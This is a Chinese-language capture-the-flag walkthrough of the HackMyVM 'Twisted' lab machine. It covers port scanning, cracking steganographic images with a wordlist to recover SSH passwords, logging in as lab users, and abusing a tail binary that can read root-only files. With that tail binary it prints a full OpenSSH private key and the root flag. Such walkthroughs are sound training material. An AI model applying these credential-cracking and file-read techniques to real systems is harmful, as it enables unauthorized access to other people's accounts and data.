[HMV] Twisted

0x00 配置

攻击机 IP: 172.16.1.25

靶机 IP: 172.16.1.89

0x01 攻击

使用 Nmap 扫描目标靶机开放的端口

┌──(root㉿Kali-VM)-[~]
└─# nmap -sC -sV -p- 172.16.1.89
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-15 09:58 CST
Nmap scan report for 172.16.1.89
Host is up (0.00049s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
80/tcp   open  http    nginx 1.14.2
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.14.2
2222/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 6763a0c98b7af342ac49aba6a73ffcee (RSA)
|   256 8cce8747f8b81a1a78e5b7ce74d7f5db (ECDSA)
|_  256 9294660b92d3cf7effe8bf3c7b41b75a (ED25519)
MAC Address: 08:00:27:29:18:4B (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.95 seconds

发现了两个端口 80 (HTTP) 和 2222 (SSH)。先看 HTTP

猜测有隐写，下载下来用 stegseek 破解

┌──(root㉿Kali-VM)-[~/work]
└─# stegseek ./cat-hidden.jpg /usr/share/wordlists/rockyou.txt
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Found passphrase: "sexymama"
[i] Original filename: "mateo.txt".
[i] Extracting to "cat-hidden.jpg.out".

┌──(root㉿Kali-VM)-[~/work]
└─# cat ./cat-hidden.jpg.out
thisismypassword

┌──(root㉿Kali-VM)-[~/work]
└─# stegseek ./cat-original.jpg /usr/share/wordlists/rockyou.txt
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Found passphrase: "westlife"
[i] Original filename: "markus.txt".
[i] Extracting to "cat-original.jpg.out".

┌──(root㉿Kali-VM)-[~/work]
└─# cat cat-original.jpg.out 
markuslovesbonita

扫描网站后发现空空如也，猜测刚才的密码是直接登录 SSH 用的。使用用户 root 登录失败，联想到刚才 stegseek 的 Original filename: "mateo.txt"，使用用户名 mateo 成功登录 SSH

[C:\~]$ ssh mateo@172.16.1.89 2222


Connecting to 172.16.1.89:2222...
Connection established.
To escape to local shell, press Ctrl+Alt+].

Linux twisted 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Oct 14 03:21:44 2020 from 192.168.1.58

mateo@twisted:~$ id
uid=1000(mateo) gid=1000(mateo) groups=1000(mateo),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

mateo@twisted:~$ whoami
mateo

在 mateo 用户的家目录发现了提示

mateo@twisted:~$ ls -al /home/mateo/
total 36
drwxr-xr-x 3 mateo mateo 4096 Mar 14 22:12 .
drwxr-xr-x 5 root  root  4096 Oct 14  2020 ..
-rw------- 1 mateo mateo    5 Oct 14  2020 .bash_history
-rw-r--r-- 1 mateo mateo  220 Oct 13  2020 .bash_logout
-rw-r--r-- 1 mateo mateo 3526 Oct 13  2020 .bashrc
drwxr-xr-x 3 mateo mateo 4096 Oct 14  2020 .local
-rw------- 1 mateo mateo   25 Oct 14  2020 note.txt
-rw-r--r-- 1 mateo mateo  807 Oct 13  2020 .profile
-rw------- 1 mateo mateo   53 Mar 14 22:12 .Xauthority

mateo@twisted:~$ ls -al /home/mateo/note.txt
-rw------- 1 mateo mateo 25 Oct 14  2020 /home/mateo/note.txt

mateo@twisted:~$ cat /home/mateo/note.txt
/var/www/html/gogogo.wav

发现一个 Web 的路径，打开之后获得一个 WAV 音频文件，猜测是摩斯电码，用 解码网站 听写

不知道有什么用。再检查一下有特权的命令

mateo@twisted:~$ find / -perm -u=s -type f 2>/dev/null
/home/bonita/beroot
/usr/bin/su
/usr/bin/umount
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/mount
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/newgrp
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device

好像没什么能用来提权的，检查一下用户

mateo@twisted:~$ cat /etc/passwd | grep "/bin/"
root:x:0:0:root:/root:/bin/bash
sync:x:4:65534:sync:/bin:/bin/sync
mateo:x:1000:1000:mateo,,,:/home/mateo:/bin/bash
markus:x:1001:1001:,,,:/home/markus:/bin/bash
bonita:x:1002:1002:,,,:/home/bonita:/bin/bash

发现了一个 markus 用户，和之前的 mateo 对上了，都是隐写图片里的文件名，尝试登录 markus 用户

[C:\~]$ ssh markus@172.16.1.89 2222


Connecting to 172.16.1.89:2222...
Connection established.
To escape to local shell, press Ctrl+Alt+].

Linux twisted 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
/usr/bin/xauth:  file /home/markus/.Xauthority does not exist

markus@twisted:~$ id
uid=1001(markus) gid=1001(markus) groups=1001(markus)

markus@twisted:~$ whoami
markus

登录成功了，检查一下家目录

markus@twisted:~$ ls -al ~
total 32
drwxr-xr-x 3 markus markus 4096 Mar 14 22:43 .
drwxr-xr-x 5 root   root   4096 Oct 14  2020 ..
-rw-r--r-- 1 markus markus  220 Oct 14  2020 .bash_logout
-rw-r--r-- 1 markus markus 3526 Oct 14  2020 .bashrc
drwxr-xr-x 3 markus markus 4096 Oct 14  2020 .local
-rw------- 1 markus markus   85 Oct 14  2020 note.txt
-rw-r--r-- 1 markus markus  807 Oct 14  2020 .profile
-rw------- 1 markus markus   53 Mar 14 22:43 .Xauthority

markus@twisted:~$ cat ~/note.txt 
Hi bonita,
I have saved your id_rsa here: /var/cache/apt/id_rsa
Nobody can find it.

发现了用户 bonita 的 SSH 私钥，但是只有 root 用户有权限读写

markus@twisted:~$ ls -al /var/cache/apt/id_rsa
-rw------- 1 root root 1823 Oct 14  2020 /var/cache/apt/id_rsa

这一步很邪门，网上的题解都说要用 tail 命令来读 /var/cache/apt/id_rsa

markus@twisted:~$ tail -n 80 /var/cache/apt/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEA8NIseqX1B1YSHTz1A4rFWhjIJffs5vSbAG0Vg2iTa+xshyrmk6zd
FyguFUO7tN2TCJGTomDTXrG/KvWaucGvIAXpgV1lQsQkBV/VNrVC1Ioj/Fx3hUaSCC4PBS
olvmldJg2habNOUGA4EBKlTwfDi+vjDP8d77mF+rvA3EwR3vj37AiXFk5hBEsqr9cWeTr1
vD5282SncYtJb/Zx0eOa6VVFqDfOB7LKZA2QYIbfR7jezOdX+/nlDKX8Xp07wimFuMJpcF
gFnch7ptoxAqe0M0UIEzP+G2ull3m80G5L7Q/3acg14ULnNVs5dTJWPO2Fp7J2qKW+4A5C
tt0G5sIBpQAAA8hHx4cBR8eHAQAAAAdzc2gtcnNhAAABAQDw0ix6pfUHVhIdPPUDisVaGM
gl9+zm9JsAbRWDaJNr7GyHKuaTrN0XKC4VQ7u03ZMIkZOiYNNesb8q9Zq5wa8gBemBXWVC
xCQFX9U2tULUiiP8XHeFRpIILg8FKiW+aV0mDaFps05QYDgQEqVPB8OL6+MM/x3vuYX6u8
DcTBHe+PfsCJcWTmEESyqv1xZ5OvW8PnbzZKdxi0lv9nHR45rpVUWoN84HsspkDZBght9H
uN7M51f7+eUMpfxenTvCKYW4wmlwWAWdyHum2jECp7QzRQgTM/4ba6WXebzQbkvtD/dpyD
XhQuc1Wzl1MlY87YWnsnaopb7gDkK23QbmwgGlAAAAAwEAAQAAAQAuUW5GpLbNE2vmfbvu
U3mDy7JrQxUokrFhUpnJrYp1PoLdOI4ipyPa+VprspxevCM0ibNojtD4rJ1FKPn6cls5gI
mZ3RnFzq3S7sy2egSBlpQ3TJ2cX6dktV8kMigSSHenAwYhq2ALq4X86WksGyUsO1FvRX4/
hmJTiFsew+7IAKE+oQHMzpjMGyoiPXfdaI3sa10L2WfkKs4I4K/v/x2pW78HIktaQPutro
nxD8/fwGxQnseC69E6vdh/5tS8+lDEfYDz4oEy9AP26Hdtho0D6E9VT9T//2vynHLbmSXK
mPbr04h5i9C3h81rh4sAHs9nVAEe3dmZtmZxoZPOJKRhAAAAgFD+g8BhMCovIBrPZlHCu+
bUlbizp9qfXEc8BYZD3frLbVfwuL6dafDVnj7EqpabmrTLFunQG+9/PI6bN+iwloDlugtq
yzvf924Kkhdk+N366FLDt06p2tkcmRljm9kKMS3lBPMu9C4+fgo9LCyphiXrm7UbJHDVSP
UvPg4Fg/nqAAAAgQD9Q83ZcqDIx5c51fdYsMUCByLby7OiIfXukMoYPWCE2yRqa53PgXjh
V2URHPPhqFEa+iB138cSgCU3RxbRK7Qm1S7/P44fnWCaNu920iLed5z2fzvbTytE/h9QpJ
LlecEv2Hx03xyRZBsHFkMf+dMDC0ueU692Gl7YxRw+Lic0PQAAAIEA82v3Ytb97SghV7rz
a0S5t7v8pSSYZAW0OJ3DJqaLtEvxhhomduhF71T0iw0wy8rSH7j2M5PGCtCZUa2/OqQgKF
eERnqQPQSgM0PrATtihXYCTGbWo69NUMcALah0gT5i6nvR1Jr4220InGZEUWHLfvkGTitu
D0POe+rjV4B7EYkAAAAOYm9uaXRhQHR3aXN0ZWQBAgMEBQ==
-----END OPENSSH PRIVATE KEY-----

但是 tail 命令并没有特殊权限

markus@twisted:~$ ls -al /usr/bin/tail
-rwxr-xr-x 1 root root 72608 Feb 28  2019 /usr/bin/tail

markus@twisted:~$ ls -al /usr/bin/cat
-rwxr-xr-x 1 root root 43744 Feb 28  2019 /usr/bin/cat

markus@twisted:~$ ls -al /usr/bin/head
-rwxr-xr-x 1 root root 47840 Feb 28  2019 /usr/bin/head

理想解法应该是用 tail 获得私钥之后登录 bonita，但是既然 tail 命令能获取无权读取的东西，那么为什么不直接获取 /root/root.txt 呢

markus@twisted:~$ tail -n 80 /root/root.txt
HMVwhereismycat

markus@twisted:~$ tail -n 80 /home/bonita/user.txt
HMVblackcat

0x02 总结

邪门